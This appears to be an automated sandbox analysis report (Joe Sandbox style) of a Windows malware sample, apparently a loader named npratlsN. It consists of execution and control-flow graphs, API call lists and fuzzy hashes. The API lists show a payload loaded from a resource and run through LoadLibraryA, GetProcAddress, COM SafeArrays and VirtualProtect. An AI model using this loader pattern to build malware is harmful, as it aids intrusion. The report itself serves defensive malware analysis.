                                                                                                                                                                          execution_graph 84039 2854d044 84040 2854d05c 84039->84040 84041 2854d0b6 84040->84041 84045 2d026e28 84040->84045 84049 2d024c2c 84040->84049 84057 2d026e23 84040->84057 84046 2d026e4e 84045->84046 84047 2d024c2c CallWindowProcW 84046->84047 84048 2d026e6f 84047->84048 84048->84041 84052 2d024c37 84049->84052 84050 2d027cb9 84070 2d024d54 84050->84070 84052->84050 84053 2d027ca9 84052->84053 84061 2d027de0 84053->84061 84065 2d027eac 84053->84065 84054 2d027cb7 84058 2d026e28 84057->84058 84059 2d024c2c CallWindowProcW 84058->84059 84060 2d026e6f 84059->84060 84060->84041 84063 2d027df4 84061->84063 84062 2d027e80 84062->84054 84074 2d027e98 84063->84074 84066 2d027eba 84065->84066 84067 2d027e6a 84065->84067 84069 2d027e98 CallWindowProcW 84067->84069 84068 2d027e80 84068->84054 84069->84068 84071 2d024d5f 84070->84071 84072 2d02939a CallWindowProcW 84071->84072 84073 2d029349 84071->84073 84072->84073 84073->84054 84075 2d027ea9 84074->84075 84077 2d0292e0 84074->84077 84075->84062 84078 2d024d54 CallWindowProcW 84077->84078 84079 2d0292ea 84078->84079 84079->84075 84080 2d026b90 84081 2d026c28 CreateWindowExW 84080->84081 84083 2d026d66 84081->84083 84018 2c96bd10 DuplicateHandle 84019 2c96bded 84018->84019 84303 285ff1b8 84304 285ff1fc CloseHandle 84303->84304 84306 285ff248 84304->84306 84307 40cbf7 84308 40cc08 84307->84308 84351 40d534 HeapCreate 84308->84351 84311 40cc46 84412 41087e 71 API calls 8 library calls 84311->84412 84314 40cc4c 84315 40cc50 84314->84315 84316 40cc58 __RTC_Initialize 84314->84316 84413 40cbb4 62 API calls 3 library calls 84315->84413 84353 411a15 67 API calls 3 library calls 84316->84353 84318 40cc57 84318->84316 84320 40cc66 84321 40cc72 GetCommandLineA 84320->84321 84322 40cc6a 84320->84322 84354 412892 71 API calls 3 library calls 84321->84354 84414 40e79a 62 API calls 3 library calls 84322->84414 84325 40cc82 84415 4127d7 107 API calls 3 library calls 84325->84415 84326 40cc71 84326->84321 84328 40cc8c 84329 40cc90 84328->84329 84330 40cc98 84328->84330 84416 40e79a 62 API calls 3 library calls 84329->84416 84355 41255f 106 API calls 6 library calls 84330->84355 84333 40cc97 84333->84330 84334 40cc9d 84335 40cca1 84334->84335 84336 40cca9 84334->84336 84417 40e79a 62 API calls 3 library calls 84335->84417 84356 40e859 73 API calls 5 library calls 84336->84356 84339 40cca8 84339->84336 84340 40ccb0 84341 40ccb5 84340->84341 84342 40ccbc 84340->84342 84418 40e79a 62 API calls 3 library calls 84341->84418 84357 4019f0 OleInitialize 84342->84357 84345 40ccbb 84345->84342 84346 40ccd8 84347 40ccea 84346->84347 84419 40ea0a 62 API calls _doexit 84346->84419 84420 40ea36 62 API calls _doexit 84347->84420 84350 40ccef __fsopen 84352 40cc3a 84351->84352 84352->84311 84411 40cbb4 62 API calls 3 library calls 84352->84411 84353->84320 84354->84325 84355->84334 84356->84340 84358 401ab9 84357->84358 84421 40b99e 84358->84421 84360 401abf 84361 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 84360->84361 84390 402467 84360->84390 84362 401dc3 CloseHandle GetModuleHandleA 84361->84362 84370 401c55 84361->84370 84434 401650 84362->84434 84364 401e8b FindResourceA LoadResource LockResource SizeofResource 84436 40b84d 84364->84436 84368 401c9c CloseHandle 84368->84346 84369 401ecb _memset 84371 401efc SizeofResource 84369->84371 84370->84368 84374 401cf9 Module32Next 84370->84374 84372 401f1c 84371->84372 84373 401f5f 84371->84373 84372->84373 84492 401560 __VEC_memcpy __shift 84372->84492 84376 401f92 _memset 84373->84376 84493 401560 __VEC_memcpy __shift 84373->84493 84374->84362 84382 401d0f 84374->84382 84378 401fa2 FreeResource 84376->84378 84379 40b84d _malloc 62 API calls 84378->84379 84380 401fbb SizeofResource 84379->84380 84381 401fe5 _memset 84380->84381 84383 4020aa LoadLibraryA 84381->84383 84382->84368 84386 401dad Module32Next 84382->84386 84384 401650 84383->84384 84385 40216c GetProcAddress 84384->84385 84387 4021aa 84385->84387 84385->84390 84386->84362 84386->84382 84387->84390 84466 4018f0 84387->84466 84390->84346 84391 4021f1 84409 40243f 84391->84409 84478 401870 84391->84478 84393 402269 VariantInit 84394 401870 75 API calls 84393->84394 84395 40228b VariantInit 84394->84395 84396 4022a7 84395->84396 84397 4022d9 SafeArrayCreate SafeArrayAccessData 84396->84397 84483 40b350 84397->84483 84400 40232c 84401 402354 SafeArrayDestroy 84400->84401 84410 40235b 84400->84410 84401->84410 84402 402392 SafeArrayCreateVector 84403 4023a4 84402->84403 84404 4023bc VariantClear VariantClear 84403->84404 84485 4019a0 84404->84485 84407 40242e 84408 4019a0 65 API calls 84407->84408 84408->84409 84409->84390 84494 40b6b5 62 API calls __fsopen 84409->84494 84410->84402 84411->84311 84412->84314 84413->84318 84414->84326 84415->84328 84416->84333 84417->84339 84418->84345 84419->84347 84420->84350 84424 40b9aa __fsopen _strnlen 84421->84424 84422 40b9b8 84495 40bfc1 62 API calls __getptd_noexit 84422->84495 84424->84422 84427 40b9ec 84424->84427 84425 40b9bd 84496 40e744 6 API calls 2 library calls 84425->84496 84497 40d6e0 62 API calls 2 library calls 84427->84497 84429 40b9f3 84498 40b917 120 API calls 3 library calls 84429->84498 84431 40b9cd __fsopen 84431->84360 84432 40b9ff 84499 40ba18 LeaveCriticalSection _doexit 84432->84499 84435 4017cc _realloc 84434->84435 84435->84364 84437 40b900 84436->84437 84450 40b85f 84436->84450 84507 40d2e3 6 API calls __decode_pointer 84437->84507 84439 40b906 84508 40bfc1 62 API calls __getptd_noexit 84439->84508 84444 40b8bc RtlAllocateHeap 84444->84450 84446 40b870 84446->84450 84500 40ec4d 62 API calls 2 library calls 84446->84500 84501 40eaa2 62 API calls 7 library calls 84446->84501 84502 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84446->84502 84447 40b8ec 84505 40bfc1 62 API calls __getptd_noexit 84447->84505 84450->84444 84450->84446 84450->84447 84451 40b8f1 84450->84451 84453 401ebf 84450->84453 84503 40b7fe 62 API calls 4 library calls 84450->84503 84504 40d2e3 6 API calls __decode_pointer 84450->84504 84506 40bfc1 62 API calls __getptd_noexit 84451->84506 84454 40af66 84453->84454 84456 40af70 84454->84456 84455 40b84d _malloc 62 API calls 84455->84456 84456->84455 84457 40af8a 84456->84457 84460 40af8c std::bad_alloc::bad_alloc 84456->84460 84509 40d2e3 6 API calls __decode_pointer 84456->84509 84457->84369 84464 40afb2 84460->84464 84510 40d2bd 73 API calls __cinit 84460->84510 84461 40afbc 84512 40cd39 RaiseException 84461->84512 84511 40af49 62 API calls std::exception::exception 84464->84511 84465 40afca 84467 401903 lstrlenA 84466->84467 84468 4018fc 84466->84468 84513 4017e0 84467->84513 84468->84391 84471 401940 GetLastError 84473 40194b MultiByteToWideChar 84471->84473 84474 40198d 84471->84474 84472 401996 84472->84391 84475 4017e0 77 API calls 84473->84475 84474->84472 84529 401030 GetLastError EntryPoint 84474->84529 84476 401970 MultiByteToWideChar 84475->84476 84476->84474 84479 40af66 74 API calls 84478->84479 84480 40187c 84479->84480 84481 401885 SysAllocString 84480->84481 84482 4018a4 84480->84482 84481->84482 84482->84393 84484 40231a SafeArrayUnaccessData 84483->84484 84484->84400 84486 4019df VariantClear 84485->84486 84487 4019aa InterlockedDecrement 84485->84487 84486->84407 84487->84486 84488 4019b8 84487->84488 84488->84486 84489 4019c2 SysFreeString 84488->84489 84490 4019c9 84488->84490 84489->84490 84533 40aec0 63 API calls __fsopen 84490->84533 84492->84372 84493->84376 84494->84390 84495->84425 84497->84429 84498->84432 84499->84431 84500->84446 84501->84446 84503->84450 84504->84450 84505->84451 84506->84453 84507->84439 84508->84453 84509->84456 84510->84464 84511->84461 84512->84465 84514 4017f3 84513->84514 84515 4017e9 EntryPoint 84513->84515 84516 401805 84514->84516 84517 4017fb EntryPoint 84514->84517 84515->84514 84518 401818 84516->84518 84519 40180e EntryPoint 84516->84519 84517->84516 84520 40183e 84518->84520 84527 401844 84518->84527 84530 40b783 72 API calls 4 library calls 84518->84530 84519->84518 84531 40b6b5 62 API calls __fsopen 84520->84531 84524 40182d 84524->84527 84528 401834 EntryPoint 84524->84528 84525 40186d MultiByteToWideChar 84525->84471 84525->84472 84526 40184e EntryPoint 84526->84527 84527->84525 84527->84526 84532 40b743 62 API calls 2 library calls 84527->84532 84528->84520 84530->84524 84531->84527 84532->84527 84533->84486 84084 2b7ccb20 84113 2b7ccb2c 84084->84113 84085 2b7ccbcb 84126 2c8965b0 84085->84126 84131 2c8965c0 84085->84131 84086 2b7cccdc 84136 2c905438 84086->84136 84141 2c905328 84086->84141 84087 2b7ccdf4 84146 2c940e98 84087->84146 84151 2c940e87 84087->84151 84088 2b7ccefe 84156 2c941353 84088->84156 84161 2c941360 84088->84161 84089 2b7ccf05 84166 2c947383 84089->84166 84171 2c947390 84089->84171 84090 2b7cd00f 84176 2c94ecd8 84090->84176 84181 2c94ecc8 84090->84181 84091 2b7cd120 84186 2c956760 84091->84186 84191 2c95675a 84091->84191 84092 2b7cd238 84196 2c95c78a 84092->84196 84201 2c95c790 84092->84201 84093 2b7cd342 84094 2b7cd3ea 84093->84094 84206 2c96a9c0 84093->84206 84210 2c96a9b2 84093->84210 84116 2c880e2b 84113->84116 84121 2c880e38 84113->84121 84117 2c880e38 84116->84117 84118 2c880f26 84117->84118 84214 2c887a28 84117->84214 84218 2c887e0c 84117->84218 84118->84085 84122 2c880e5a 84121->84122 84123 2c880f26 84122->84123 84124 2c887a28 LdrInitializeThunk 84122->84124 84125 2c887e0c LdrInitializeThunk 84122->84125 84123->84085 84124->84123 84125->84123 84127 2c8965c0 84126->84127 84128 2c8966f4 84127->84128 84129 2c887a28 LdrInitializeThunk 84127->84129 84130 2c887e0c LdrInitializeThunk 84127->84130 84128->84086 84129->84128 84130->84128 84132 2c8965e2 84131->84132 84133 2c8966f4 84132->84133 84134 2c887a28 LdrInitializeThunk 84132->84134 84135 2c887e0c LdrInitializeThunk 84132->84135 84133->84086 84134->84133 84135->84133 84137 2c90545a 84136->84137 84138 2c90552d 84137->84138 84139 2c887a28 LdrInitializeThunk 84137->84139 84140 2c887e0c LdrInitializeThunk 84137->84140 84138->84087 84139->84138 84140->84138 84145 2c905336 84141->84145 84142 2c90552d 84142->84087 84143 2c887a28 LdrInitializeThunk 84143->84142 84144 2c887e0c LdrInitializeThunk 84144->84142 84145->84142 84145->84143 84145->84144 84147 2c940eba 84146->84147 84148 2c940f8d 84147->84148 84149 2c887a28 LdrInitializeThunk 84147->84149 84150 2c887e0c LdrInitializeThunk 84147->84150 84148->84088 84149->84148 84150->84148 84152 2c940eba 84151->84152 84153 2c940f8d 84152->84153 84154 2c887a28 LdrInitializeThunk 84152->84154 84155 2c887e0c LdrInitializeThunk 84152->84155 84153->84088 84154->84153 84155->84153 84157 2c94137c 84156->84157 84158 2c941427 84157->84158 84159 2c887a28 LdrInitializeThunk 84157->84159 84160 2c887e0c LdrInitializeThunk 84157->84160 84158->84089 84159->84158 84160->84158 84162 2c94137c 84161->84162 84163 2c941427 84162->84163 84164 2c887a28 LdrInitializeThunk 84162->84164 84165 2c887e0c LdrInitializeThunk 84162->84165 84163->84089 84164->84163 84165->84163 84168 2c947390 84166->84168 84167 2c947457 84167->84090 84168->84167 84169 2c887a28 LdrInitializeThunk 84168->84169 84170 2c887e0c LdrInitializeThunk 84168->84170 84169->84167 84170->84167 84172 2c9473ac 84171->84172 84173 2c947457 84172->84173 84174 2c887a28 LdrInitializeThunk 84172->84174 84175 2c887e0c LdrInitializeThunk 84172->84175 84173->84090 84174->84173 84175->84173 84177 2c94ecfa 84176->84177 84178 2c94edaa 84177->84178 84179 2c887a28 LdrInitializeThunk 84177->84179 84180 2c887e0c LdrInitializeThunk 84177->84180 84178->84091 84179->84178 84180->84178 84182 2c94ecd8 84181->84182 84183 2c94edaa 84182->84183 84184 2c887a28 LdrInitializeThunk 84182->84184 84185 2c887e0c LdrInitializeThunk 84182->84185 84183->84091 84184->84183 84185->84183 84187 2c95677c 84186->84187 84188 2c956827 84187->84188 84189 2c887a28 LdrInitializeThunk 84187->84189 84190 2c887e0c LdrInitializeThunk 84187->84190 84188->84092 84189->84188 84190->84188 84192 2c95677c 84191->84192 84193 2c956827 84192->84193 84194 2c887a28 LdrInitializeThunk 84192->84194 84195 2c887e0c LdrInitializeThunk 84192->84195 84193->84092 84194->84193 84195->84193 84197 2c95c790 84196->84197 84198 2c95c857 84197->84198 84199 2c887a28 LdrInitializeThunk 84197->84199 84200 2c887e0c LdrInitializeThunk 84197->84200 84198->84093 84199->84198 84200->84198 84202 2c95c7ac 84201->84202 84203 2c95c857 84202->84203 84204 2c887a28 LdrInitializeThunk 84202->84204 84205 2c887e0c LdrInitializeThunk 84202->84205 84203->84093 84204->84203 84205->84203 84207 2c96a9cf 84206->84207 84222 2c96a0f4 84207->84222 84213 2c96a9c0 84210->84213 84211 2c96a0f4 2 API calls 84212 2c96a9f0 84211->84212 84212->84094 84213->84211 84217 2c887a59 84214->84217 84215 2c887bb9 84215->84118 84216 2c887f49 LdrInitializeThunk 84216->84215 84217->84215 84217->84216 84221 2c887cc3 84218->84221 84219 2c887f49 LdrInitializeThunk 84220 2c887f61 84219->84220 84220->84118 84221->84219 84223 2c96a0ff 84222->84223 84226 2c96b864 84223->84226 84225 2c96c3e6 84225->84225 84227 2c96b86f 84226->84227 84228 2c96cb0c 84227->84228 84229 2c96cb67 84227->84229 84233 2c96e7a0 84227->84233 84238 2c96e79e 84227->84238 84228->84229 84243 2d02c011 84228->84243 84229->84225 84235 2c96e7c1 84233->84235 84234 2c96e7e5 84234->84228 84235->84234 84247 2c96e948 84235->84247 84251 2c96e950 84235->84251 84240 2c96e7c1 84238->84240 84239 2c96e7e5 84239->84228 84240->84239 84241 2c96e950 GetModuleHandleW 84240->84241 84242 2c96e948 GetModuleHandleW 84240->84242 84241->84239 84242->84239 84245 2d02c041 84243->84245 84244 2d02c420 WaitMessage 84244->84245 84245->84244 84246 2d02c0cc 84245->84246 84248 2c96e95d 84247->84248 84249 2c96e996 84248->84249 84255 2c96cf4c 84248->84255 84249->84234 84252 2c96e95d 84251->84252 84253 2c96e996 84252->84253 84254 2c96cf4c GetModuleHandleW 84252->84254 84253->84234 84254->84253 84256 2c96cf57 84255->84256 84258 2c96ea08 84256->84258 84259 2c96cf80 84256->84259 84258->84258 84260 2c96cf8b 84259->84260 84266 2c96cf90 84260->84266 84262 2c96ea77 84270 2d024160 84262->84270 84276 2d024158 84262->84276 84263 2c96eab1 84263->84258 84269 2c96cf9b 84266->84269 84267 2c96fd98 84267->84262 84268 2c96e7a0 GetModuleHandleW 84268->84267 84269->84267 84269->84268 84272 2d024191 84270->84272 84273 2d0241dd 84270->84273 84271 2d02419d 84271->84263 84272->84271 84282 2d0243d8 84272->84282 84285 2d0243c8 84272->84285 84273->84263 84278 2d024191 84276->84278 84279 2d0241dd 84276->84279 84277 2d02419d 84277->84263 84278->84277 84280 2d0243c8 GetModuleHandleW 84278->84280 84281 2d0243d8 GetModuleHandleW 84278->84281 84279->84263 84280->84279 84281->84279 84283 2d0243e2 84282->84283 84288 2d024420 84282->84288 84283->84273 84287 2d024420 GetModuleHandleW 84285->84287 84286 2d0243e2 84286->84273 84287->84286 84289 2d02445c 84288->84289 84290 2d024439 84288->84290 84289->84283 84290->84289 84291 2d02467d GetModuleHandleW 84290->84291 84292 2d0246bc 84291->84292 84292->84283 84293 2c96bac8 84294 2c96bb0e GetCurrentProcess 84293->84294 84296 2c96bb60 GetCurrentThread 84294->84296 84297 2c96bb59 84294->84297 84298 2c96bb96 84296->84298 84299 2c96bb9d GetCurrentProcess 84296->84299 84297->84296 84298->84299 84302 2c96bbd3 84299->84302 84300 2c96bbfb GetCurrentThreadId 84301 2c96bc2c 84300->84301 84302->84300 84020 285f0e90 84021 285f0e9c 84020->84021 84022 285f0ea7 84021->84022 84025 285f4f2b 84021->84025 84028 285f342a 84021->84028 84031 285fedd0 84025->84031 84030 285fedd0 VirtualProtect 84028->84030 84029 285f3443 84030->84029 84033 285fedf7 84031->84033 84035 285feee8 84033->84035 84036 285fef31 VirtualProtect 84035->84036 84038 285f1710 84036->84038

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 13 401c73-401c77 8->13 15 401c93-401c95 13->15 16 401c79-401c7b 13->16 20 401c98-401c9a 15->20 18 401c7d-401c83 16->18 19 401c8f-401c91 16->19 18->15 22 401c85-401c8d 18->22 19->20 23 401cb0-401cce call 401650 20->23 24 401c9c-401caf CloseHandle 20->24 22->13 22->19 34 401cd0-401cd4 23->34 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 39 401f1c-401f2f 30->39 40 401f5f-401f69 30->40 36 401cf0-401cf2 34->36 37 401cd6-401cd8 34->37 38 401cf5-401cf7 36->38 41 401cda-401ce0 37->41 42 401cec-401cee 37->42 38->24 43 401cf9-401d09 Module32Next 38->43 44 401f33-401f5d call 401560 39->44 45 401f73-401f75 40->45 46 401f6b-401f72 40->46 41->36 47 401ce2-401cea 41->47 42->38 43->7 48 401d0f 43->48 44->40 50 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 45->50 51 401f77-401f8d call 401560 45->51 46->45 47->34 47->42 53 401d10-401d2e call 401650 48->53 50->5 87 4021aa-4021c0 50->87 51->50 61 401d30-401d34 53->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->24 71 401d5d-401d7b call 401650 68->71 70->61 70->67 76 401d80-401d84 71->76 78 401da0-401da2 76->78 79 401d86-401d88 76->79 83 401da5-401da7 78->83 81 401d8a-401d90 79->81 82 401d9c-401d9e 79->82 81->78 85 401d92-401d9a 81->85 82->83 83->24 86 401dad-401dbd Module32Next 83->86 85->76 85->82 86->7 86->53 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 2853d006 122->154 155 40234e call 2853d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 2853d006 135->152 153 402390 call 2853d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                                                                          APIs
                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                          • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                          • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                                                          • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                                                          • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                          • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                          • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3047680567.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000008.00000002.3047680567.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000008.00000002.3047680567.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_npratlsN.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                          • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                          • API String ID: 1430744539-2962942730
                                                                                                                                                                          • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                          • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                          • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                          • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                          Function 2B7CAA58 Relevance: 6.6, Strings: 5, Instructions: 352COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1502 2b7caa58-2b7caa6b 1503 2b7cabaa-2b7cabb1 1502->1503 1504 2b7caa71-2b7caa7a 1502->1504 1505 2b7cabb4 1504->1505 1506 2b7caa80-2b7caa84 1504->1506 1509 2b7cabb9-2b7cabe0 1505->1509 1507 2b7caa9e-2b7caaa5 1506->1507 1508 2b7caa86 1506->1508 1507->1503 1511 2b7caaab-2b7caab8 1507->1511 1510 2b7caa89-2b7caa94 1508->1510 1515 2b7cac0c 1509->1515 1516 2b7cabe2-2b7cabfa 1509->1516 1510->1505 1512 2b7caa9a-2b7caa9c 1510->1512 1511->1503 1517 2b7caabe-2b7caad1 1511->1517 1512->1507 1512->1510 1518 2b7cac0e-2b7cac12 1515->1518 1530 2b7cabfc-2b7cac01 1516->1530 1531 2b7cac03-2b7cac06 1516->1531 1519 2b7caad6-2b7caade 1517->1519 1520 2b7caad3 1517->1520 1521 2b7cab4b-2b7cab4d 1519->1521 1522 2b7caae0-2b7caae6 1519->1522 1520->1519 1521->1503 1524 2b7cab4f-2b7cab55 1521->1524 1522->1521 1525 2b7caae8-2b7caaee 1522->1525 1524->1503 1526 2b7cab57-2b7cab61 1524->1526 1525->1509 1527 2b7caaf4-2b7cab0c 1525->1527 1526->1509 1529 2b7cab63-2b7cab7b 1526->1529 1539 2b7cab0e-2b7cab14 1527->1539 1540 2b7cab39-2b7cab3c 1527->1540 1542 2b7cab7d-2b7cab83 1529->1542 1543 2b7caba0-2b7caba3 1529->1543 1530->1518 1533 2b7cac08-2b7cac0a 1531->1533 1534 2b7cac13-2b7cac5f 1531->1534 1533->1515 1533->1516 1546 2b7cac66-2b7cad43 call 2b7c3400 call 2b7c2f20 1534->1546 1547 2b7cac61 1534->1547 1539->1509 1544 2b7cab1a-2b7cab2e 1539->1544 1540->1505 1545 2b7cab3e-2b7cab41 1540->1545 1542->1509 1548 2b7cab85-2b7cab99 1542->1548 1543->1505 1549 2b7caba5-2b7caba8 1543->1549 1544->1509 1554 2b7cab34 1544->1554 1545->1505 1550 2b7cab43-2b7cab49 1545->1550 1564 2b7cad4a-2b7cad6b call 2b7c44d0 1546->1564 1565 2b7cad45 1546->1565 1547->1546 1548->1509 1555 2b7cab9b 1548->1555 1549->1503 1549->1526 1550->1521 1550->1522 1554->1540 1555->1543 1567 2b7cad70-2b7cad7b 1564->1567 1565->1564 1568 2b7cad7d 1567->1568 1569 2b7cad82-2b7cad86 1567->1569 1568->1569 1570 2b7cad88-2b7cad89 1569->1570 1571 2b7cad8b-2b7cad92 1569->1571 1572 2b7cadaa-2b7cadee 1570->1572 1573 2b7cad99-2b7cada7 1571->1573 1574 2b7cad94 1571->1574 1578 2b7cae54-2b7cae6b 1572->1578 1573->1572 1574->1573 1580 2b7cae6d-2b7cae92 1578->1580 1581 2b7cadf0-2b7cae06 1578->1581 1588 2b7caeaa 1580->1588 1589 2b7cae94-2b7caea9 1580->1589 1585 2b7cae08-2b7cae14 1581->1585 1586 2b7cae30 1581->1586 1590 2b7cae1e-2b7cae24 1585->1590 1591 2b7cae16-2b7cae1c 1585->1591 1587 2b7cae36-2b7cae53 1586->1587 1587->1578 1593 2b7caeab 1588->1593 1589->1588 1592 2b7cae2e 1590->1592 1591->1592 1592->1587 1593->1593
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: 966b6c0996f673ef584c2020564a89728e0dbd9b7d20364b7d43ab6ae4ee507c
                                                                                                                                                                          • Instruction ID: 8e013f29834240157f18b38fc26129d7a4ee526f42207de144c65b832f1d3663
                                                                                                                                                                          • Opcode Fuzzy Hash: 966b6c0996f673ef584c2020564a89728e0dbd9b7d20364b7d43ab6ae4ee507c
                                                                                                                                                                          • Instruction Fuzzy Hash: 83E1FC74E00218CFDB14CFA9D984A9EBBF2BF48311F158069E919AB366DB35E941CF50
                                                                                                                                                                          Function 2B7C41E1 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1597 2b7c41e1-2b7c421f 1599 2b7c4226-2b7c4303 call 2b7c3400 call 2b7c2f20 1597->1599 1600 2b7c4221 1597->1600 1610 2b7c430a-2b7c4328 1599->1610 1611 2b7c4305 1599->1611 1600->1599 1641 2b7c432b call 2b7c44d0 1610->1641 1642 2b7c432b call 2b7c44c0 1610->1642 1611->1610 1612 2b7c4331-2b7c433c 1613 2b7c433e 1612->1613 1614 2b7c4343-2b7c4347 1612->1614 1613->1614 1615 2b7c434c-2b7c4353 1614->1615 1616 2b7c4349-2b7c434a 1614->1616 1617 2b7c435a-2b7c4368 1615->1617 1618 2b7c4355 1615->1618 1619 2b7c436b-2b7c43af 1616->1619 1617->1619 1618->1617 1623 2b7c4415-2b7c442c 1619->1623 1625 2b7c442e-2b7c4453 1623->1625 1626 2b7c43b1-2b7c43c7 1623->1626 1633 2b7c446b 1625->1633 1634 2b7c4455-2b7c446a 1625->1634 1630 2b7c43c9-2b7c43d5 1626->1630 1631 2b7c43f1 1626->1631 1635 2b7c43df-2b7c43e5 1630->1635 1636 2b7c43d7-2b7c43dd 1630->1636 1632 2b7c43f7-2b7c4414 1631->1632 1632->1623 1634->1633 1637 2b7c43ef 1635->1637 1636->1637 1637->1632 1641->1612 1642->1612
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
